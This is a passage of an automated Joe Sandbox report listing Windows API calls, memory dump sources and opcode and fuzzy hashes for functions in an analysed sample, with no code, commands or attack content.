                                                                                                                                                                                              • Instruction Fuzzy Hash: 79F0FC32A0510766CB212AA99F07FAF37588FC27F0F15012EF81456191DF75CD03B1A0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 00FB10AB
                                                                                                                                                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 00FB10B2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1231390398-0
                                                                                                                                                                                              • Opcode ID: dedac3fd6dbb243a395da033e2c76ba963c0bad86c4fccdf38aa36cc318e303c
                                                                                                                                                                                              • Instruction ID: 7ff072736f57e0d0dd3d37b4fc6ca324f8c4a3e4c58deea529c87be782b7a0a3
                                                                                                                                                                                              • Opcode Fuzzy Hash: dedac3fd6dbb243a395da033e2c76ba963c0bad86c4fccdf38aa36cc318e303c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BE09232F00149A78F1997B59C198EB73EEFA442987108176E503D3501F930DE416A60
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00FAA325,?,?,?,00FAA175,?,00000001,00000000,?,?), ref: 00FAA501
                                                                                                                                                                                                • Part of subcall function 00FABB03: _wcslen.LIBCMT ref: 00FABB27
                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00FAA325,?,?,?,00FAA175,?,00000001,00000000,?,?), ref: 00FAA532
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AttributesFile$_wcslen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2673547680-0
                                                                                                                                                                                              • Opcode ID: dd95ebce93db75533db1688bac05bc53ef93ce6cd6f19fce563376c86700b944
                                                                                                                                                                                              • Instruction ID: bd2b7450f982f89ae5e372ace32b9fb2ab5a88bebd6ea03b1f7b70da23469c76
                                                                                                                                                                                              • Opcode Fuzzy Hash: dd95ebce93db75533db1688bac05bc53ef93ce6cd6f19fce563376c86700b944
                                                                                                                                                                                              • Instruction Fuzzy Hash: DEF0A972600209BBDF025F60DC05FDA3BADAB04389F888062B949D6160DB31CA98FE20
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • DeleteFileW.KERNELBASE(000000FF,?,?,00FA977F,?,?,00FA95CF,?,?,?,?,?,00FD2641,000000FF), ref: 00FAA1F1
                                                                                                                                                                                                • Part of subcall function 00FABB03: _wcslen.LIBCMT ref: 00FABB27
                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00FA977F,?,?,00FA95CF,?,?,?,?,?,00FD2641), ref: 00FAA21F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DeleteFile$_wcslen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2643169976-0
                                                                                                                                                                                              • Opcode ID: 43707c501dedbce7004b93ac9b9e0945dc4192acc89c52780856b2079685388f
                                                                                                                                                                                              • Instruction ID: cf1652157e00d5770660b75f7a5db4532c89d559c49eb9a63da0daafc6cc303d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 43707c501dedbce7004b93ac9b9e0945dc4192acc89c52780856b2079685388f
                                                                                                                                                                                              • Instruction Fuzzy Hash: CFE092755402096BDB015F60DC45FDD3B9CAB093C5F484021B945D2054EB61DE98FA61
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,00FD2641,000000FF), ref: 00FBACB0
                                                                                                                                                                                              • CoUninitialize.COMBASE(?,?,?,?,00FD2641,000000FF), ref: 00FBACB5
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: GdiplusShutdownUninitialize
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3856339756-0
                                                                                                                                                                                              • Opcode ID: 3eda73bb4c43561d179ec66b0d296e589c8b802aa63fc6a07ff3e6e7aa291ed6
                                                                                                                                                                                              • Instruction ID: 9337e664a96d04dfcd77e5e0ef37ce79f1fbf549caceda419ad661244e464cb4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3eda73bb4c43561d179ec66b0d296e589c8b802aa63fc6a07ff3e6e7aa291ed6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2EE06572504654EFC711DB59DC46B49FBB9FB88B20F044266F416D37A0CB74A801CA91
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00FAA23A,?,00FA755C,?,?,?,?), ref: 00FAA254
                                                                                                                                                                                                • Part of subcall function 00FABB03: _wcslen.LIBCMT ref: 00FABB27
                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00FAA23A,?,00FA755C,?,?,?,?), ref: 00FAA280
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AttributesFile$_wcslen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2673547680-0
                                                                                                                                                                                              • Opcode ID: 53b5fddfb1a53223c5b381d5dc4fcc56f714bccbbb8a1d257e9f0f67ae780541
                                                                                                                                                                                              • Instruction ID: c4114427653eda7e6c7f9f07b655dfa6c3b9e35322bdb9bdd8b118cf8791d705
                                                                                                                                                                                              • Opcode Fuzzy Hash: 53b5fddfb1a53223c5b381d5dc4fcc56f714bccbbb8a1d257e9f0f67ae780541
                                                                                                                                                                                              • Instruction Fuzzy Hash: 91E0D8719001285BCB51AB74CC09BE97B9CAB0D3E5F0442A1FE45E31D0D770DE44EAE1
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00FBDEEC
                                                                                                                                                                                                • Part of subcall function 00FA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FA40A5
                                                                                                                                                                                              • SetDlgItemTextW.USER32(00000065,?), ref: 00FBDF03
                                                                                                                                                                                                • Part of subcall function 00FBB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FBB579
                                                                                                                                                                                                • Part of subcall function 00FBB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FBB58A
                                                                                                                                                                                                • Part of subcall function 00FBB568: IsDialogMessageW.USER32(00010416,?), ref: 00FBB59E
                                                                                                                                                                                                • Part of subcall function 00FBB568: TranslateMessage.USER32(?), ref: 00FBB5AC
                                                                                                                                                                                                • Part of subcall function 00FBB568: DispatchMessageW.USER32(?), ref: 00FBB5B6
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2718869927-0
                                                                                                                                                                                              • Opcode ID: 68f41903950a5efe7c445761e8956ba4280457449607efdf18c99b48132c2d55
                                                                                                                                                                                              • Instruction ID: 4d6d41740678b6d866689a6d3ea7fab3eaca02b586278dae3e521db52499df5c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 68f41903950a5efe7c445761e8956ba4280457449607efdf18c99b48132c2d55
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6CE092B640028C2ADF12BB61DC06FDE3BAC9B057C5F040851B245EB0E3DA7DEA11AB61
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FB0836
                                                                                                                                                                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00FAF2D8,Crypt32.dll,00000000,00FAF35C,?,?,00FAF33E,?,?,?), ref: 00FB0858
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1175261203-0
                                                                                                                                                                                              • Opcode ID: 0880a90c27d551c443bccc3bcfabe3ac20592d0d07feab328d1eec49b0ec6798
                                                                                                                                                                                              • Instruction ID: 9c1ec955712692c8dbe97fe325798b28cc8868000b17c9ec3dd8aea4cd981eaa
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0880a90c27d551c443bccc3bcfabe3ac20592d0d07feab328d1eec49b0ec6798
                                                                                                                                                                                              • Instruction Fuzzy Hash: 92E012B68011186ADB11A7A59C09FDA7BACBF09391F0400657645D2004DA74DA84DAB0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00FBA3DA
                                                                                                                                                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00FBA3E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: BitmapCreateFromGdipStream
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1918208029-0
                                                                                                                                                                                              • Opcode ID: 15555e602a6352f243fab120fad6a669a4f8fa2e076f8ae90b0106f6dd5d344c
                                                                                                                                                                                              • Instruction ID: 3307e6334d52442a83440d73a70208f2ebe8080f5a795a35e40a188154b524a2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 15555e602a6352f243fab120fad6a669a4f8fa2e076f8ae90b0106f6dd5d344c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 54E0ED71900218EBCB10DF56C9417D9BBE8EF04364F14C05AA84693201E374AE44EFA1
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FC2BAA
                                                                                                                                                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00FC2BB5
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1660781231-0
                                                                                                                                                                                              • Opcode ID: c1f6841912183b31340c4305219989f7e73630c5522bd8223916b67504719864
                                                                                                                                                                                              • Instruction ID: 8ad8321a3a458756b6f130321c674413318b49f8e487c1072870dc3c476361e3
                                                                                                                                                                                              • Opcode Fuzzy Hash: c1f6841912183b31340c4305219989f7e73630c5522bd8223916b67504719864
                                                                                                                                                                                              • Instruction Fuzzy Hash: 15D0A93595430798DDD8AA752F0BF4C3386EDC1BB0BA0828EF0208A4C2EE189880B012
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ItemShowWindow
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3351165006-0
                                                                                                                                                                                              • Opcode ID: 17dc02b783f56f1fed12ffbf67a2614e14b5290c77bb2257ec13ec8617ed6a26
                                                                                                                                                                                              • Instruction ID: 525ee9561f2a856820971a469f1bcd5b161c7be29decfb071b3236cace8cac2b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 17dc02b783f56f1fed12ffbf67a2614e14b5290c77bb2257ec13ec8617ed6a26
                                                                                                                                                                                              • Instruction Fuzzy Hash: 64C0123205C200BECB030BB4DC0AC6BBBB8BBA9312F04C908B0E5C0054C23EC010DB51
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                                                                              • Opcode ID: ba90fec49171823561258ed4beb90bbc07b011b5139083d134a6aec6ca2efaf7
                                                                                                                                                                                              • Instruction ID: 6720a86de05d3753ba0db8042efe822343cc09ef4dc3473da91540d8433d129e
                                                                                                                                                                                              • Opcode Fuzzy Hash: ba90fec49171823561258ed4beb90bbc07b011b5139083d134a6aec6ca2efaf7
                                                                                                                                                                                              • Instruction Fuzzy Hash: ACC1B2B0E002549FEF15CF78C884BA97BA5BF47360F0901BAEC459B392DB349944EB61
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                                                                              • Opcode ID: 338557f7682b4a30f7c994c6493c568374cfc38461d1e45889dcd78f21cfa083
                                                                                                                                                                                              • Instruction ID: c3ebe649a513adff18be469e736574154f18637b452d8a20defa165990ea8107
                                                                                                                                                                                              • Opcode Fuzzy Hash: 338557f7682b4a30f7c994c6493c568374cfc38461d1e45889dcd78f21cfa083
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0371D4B1500B449EDB35DB70CC91AE7B7E9AF16300F40492EF1AB87241DA367688EF11
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00FA8289
                                                                                                                                                                                                • Part of subcall function 00FA13DC: __EH_prolog.LIBCMT ref: 00FA13E1
                                                                                                                                                                                                • Part of subcall function 00FAA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00FAA598
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: H_prolog$CloseFind
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2506663941-0
                                                                                                                                                                                              • Opcode ID: 245e0cf8da9175bf49689a9719743973cfb256dbf5c30f8bc16736c5447e1c16
                                                                                                                                                                                              • Instruction ID: d392358e41856b92c6fe45144290128a32adc02bc19dc2fbcf914ac1c65a6b23
                                                                                                                                                                                              • Opcode Fuzzy Hash: 245e0cf8da9175bf49689a9719743973cfb256dbf5c30f8bc16736c5447e1c16
                                                                                                                                                                                              • Instruction Fuzzy Hash: B741B6B1D047589ADF20DB60CC55BEAB7B8BF05344F0404EAE48A97083EBB45EC5EB10
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00FA13E1
                                                                                                                                                                                                • Part of subcall function 00FA5E37: __EH_prolog.LIBCMT ref: 00FA5E3C
                                                                                                                                                                                                • Part of subcall function 00FACE40: __EH_prolog.LIBCMT ref: 00FACE45
                                                                                                                                                                                                • Part of subcall function 00FAB505: __EH_prolog.LIBCMT ref: 00FAB50A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                              • String ID:
